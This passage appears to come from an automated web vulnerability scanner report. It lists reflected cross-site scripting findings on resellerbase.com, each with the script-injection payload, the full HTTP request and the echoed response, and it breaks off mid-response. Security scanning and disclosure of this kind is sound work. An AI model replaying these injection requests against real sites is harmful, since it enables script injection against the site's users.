GET /tag/themes/kosmos/images/review9ef4e</title><img%20src%3da%20onerror%3dalert(1)>41fca3dcbf1/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review9ef4e</title><img src=a onerror=alert(1)>41fca3dcbf1/0.gif</title>
...[SNIP]...

2.4556. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6abcc<img%20src%3da%20onerror%3dalert(1)>6eef3525099 was submitted in the REST URL parameter 5. This input was echoed as 6abcc<img src=a onerror=alert(1)>6eef3525099 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review6abcc<img%20src%3da%20onerror%3dalert(1)>6eef3525099/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review6abcc<img src=a onerror=alert(1)>6eef3525099/0.gif]</td>
...[SNIP]...

2.4557. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6999b<img%20src%3da%20onerror%3dalert(1)>f4d1777a053 was submitted in the REST URL parameter 6. This input was echoed as 6999b<img src=a onerror=alert(1)>f4d1777a053 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/0.gif6999b<img%20src%3da%20onerror%3dalert(1)>f4d1777a053 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/0.gif6999b<img src=a onerror=alert(1)>f4d1777a053]</td>
...[SNIP]...

2.4558. http://www.resellerbase.com/tag/themes/kosmos/images/review/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 31bb1</title><img%20src%3da%20onerror%3dalert(1)>2ecdfea137d was submitted in the REST URL parameter 6. This input was echoed as 31bb1</title><img src=a onerror=alert(1)>2ecdfea137d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/0.gif31bb1</title><img%20src%3da%20onerror%3dalert(1)>2ecdfea137d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/0.gif31bb1</title><img src=a onerror=alert(1)>2ecdfea137d</title>
...[SNIP]...

2.4559. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ab9eb<script>alert(1)</script>7adf15403 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagab9eb<script>alert(1)</script>7adf15403/themes/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagab9eb<script>alert(1)</script>7adf15403/themes/kosmos/images/review/5.gif was not found on this server.</p>
...[SNIP]...

2.4560. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1f254</title><img%20src%3da%20onerror%3dalert(1)>c9dcf49b9c3 was submitted in the REST URL parameter 2. This input was echoed as 1f254</title><img src=a onerror=alert(1)>c9dcf49b9c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes1f254</title><img%20src%3da%20onerror%3dalert(1)>c9dcf49b9c3/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes1f254</title><img src=a onerror=alert(1)>c9dcf49b9c3/kosmos/images/review/5.gif</title>
...[SNIP]...

2.4561. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73c20<img%20src%3da%20onerror%3dalert(1)>de197d871eb was submitted in the REST URL parameter 2. This input was echoed as 73c20<img src=a onerror=alert(1)>de197d871eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes73c20<img%20src%3da%20onerror%3dalert(1)>de197d871eb/kosmos/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes73c20<img src=a onerror=alert(1)>de197d871eb/kosmos/images/review/5.gif]</td>
...[SNIP]...

2.4562. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 26a22</title><img%20src%3da%20onerror%3dalert(1)>b5c23eece56 was submitted in the REST URL parameter 3. This input was echoed as 26a22</title><img src=a onerror=alert(1)>b5c23eece56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos26a22</title><img%20src%3da%20onerror%3dalert(1)>b5c23eece56/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos26a22</title><img src=a onerror=alert(1)>b5c23eece56/images/review/5.gif</title>
...[SNIP]...

2.4563. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1b6ec<img%20src%3da%20onerror%3dalert(1)>66b9fee49e2 was submitted in the REST URL parameter 3. This input was echoed as 1b6ec<img src=a onerror=alert(1)>66b9fee49e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos1b6ec<img%20src%3da%20onerror%3dalert(1)>66b9fee49e2/images/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos1b6ec<img src=a onerror=alert(1)>66b9fee49e2/images/review/5.gif]</td>
...[SNIP]...

2.4564. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload d8086</title><img%20src%3da%20onerror%3dalert(1)>27f40a90020 was submitted in the REST URL parameter 4. This input was echoed as d8086</title><img src=a onerror=alert(1)>27f40a90020 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/imagesd8086</title><img%20src%3da%20onerror%3dalert(1)>27f40a90020/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesd8086</title><img src=a onerror=alert(1)>27f40a90020/review/5.gif</title>
...[SNIP]...

2.4565. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 10678<img%20src%3da%20onerror%3dalert(1)>8b976eb1078 was submitted in the REST URL parameter 4. This input was echoed as 10678<img src=a onerror=alert(1)>8b976eb1078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images10678<img%20src%3da%20onerror%3dalert(1)>8b976eb1078/review/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images10678<img src=a onerror=alert(1)>8b976eb1078/review/5.gif]</td>
...[SNIP]...

2.4566. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f2129<img%20src%3da%20onerror%3dalert(1)>e20cd9f539b was submitted in the REST URL parameter 5. This input was echoed as f2129<img src=a onerror=alert(1)>e20cd9f539b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewf2129<img%20src%3da%20onerror%3dalert(1)>e20cd9f539b/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/reviewf2129<img src=a onerror=alert(1)>e20cd9f539b/5.gif]</td>
...[SNIP]...

2.4567. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload f3bea</title><img%20src%3da%20onerror%3dalert(1)>9ed86bddc77 was submitted in the REST URL parameter 5. This input was echoed as f3bea</title><img src=a onerror=alert(1)>9ed86bddc77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewf3bea</title><img%20src%3da%20onerror%3dalert(1)>9ed86bddc77/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/reviewf3bea</title><img src=a onerror=alert(1)>9ed86bddc77/5.gif</title>
...[SNIP]...

2.4568. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b1c04<img%20src%3da%20onerror%3dalert(1)>389530f5220 was submitted in the REST URL parameter 6. This input was echoed as b1c04<img src=a onerror=alert(1)>389530f5220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/5.gifb1c04<img%20src%3da%20onerror%3dalert(1)>389530f5220 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/5.gifb1c04<img src=a onerror=alert(1)>389530f5220]</td>
...[SNIP]...

2.4569. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload b9230</title><img%20src%3da%20onerror%3dalert(1)>1225ab9fdea was submitted in the REST URL parameter 6. This input was echoed as b9230</title><img src=a onerror=alert(1)>1225ab9fdea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/5.gifb9230</title><img%20src%3da%20onerror%3dalert(1)>1225ab9fdea HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/5.gifb9230</title><img src=a onerror=alert(1)>1225ab9fdea</title>
...[SNIP]...

2.4570. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b488<script>alert(1)</script>d4885683d8b4fdd99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag8b488<script>alert(1)</script>d4885683d8b4fdd99/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:03:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8b488<script>alert(1)</script>d4885683d8b4fdd99/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4571. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce9a3<script>alert(1)</script>4ecfc3600c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagce9a3<script>alert(1)</script>4ecfc3600c6/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagce9a3<script>alert(1)</script>4ecfc3600c6/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4572. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e933f<img%20src%3da%20onerror%3dalert(1)>80fbf6004dd511993 was submitted in the REST URL parameter 2. This input was echoed as e933f<img src=a onerror=alert(1)>80fbf6004dd511993 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themese933f<img%20src%3da%20onerror%3dalert(1)>80fbf6004dd511993/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
